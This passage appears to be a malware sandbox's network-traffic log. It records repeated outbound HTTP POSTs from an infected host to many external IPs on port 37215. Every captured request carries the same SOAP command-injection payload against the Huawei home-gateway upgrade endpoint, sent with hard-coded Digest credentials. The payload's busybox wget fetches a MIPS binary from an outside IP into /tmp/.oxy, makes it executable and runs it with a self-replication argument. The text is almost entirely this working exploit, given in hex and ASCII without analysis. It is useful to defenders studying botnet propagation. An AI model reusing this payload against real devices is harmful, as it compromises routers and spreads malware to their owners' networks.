                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1772192.168.2.134174841.52.123.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630049944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1773192.168.2.134716641.94.144.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630063057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1774192.168.2.1338584197.58.197.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630099058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1775192.168.2.1334680197.132.217.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630316973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1776192.168.2.1360600197.0.13.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630361080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1777192.168.2.1334654157.67.71.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630470991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1778192.168.2.1359478141.150.130.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630474091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1779192.168.2.1360750197.24.77.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630532980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1780192.168.2.1337924197.3.51.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630549908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1781192.168.2.134645041.213.95.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630634069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 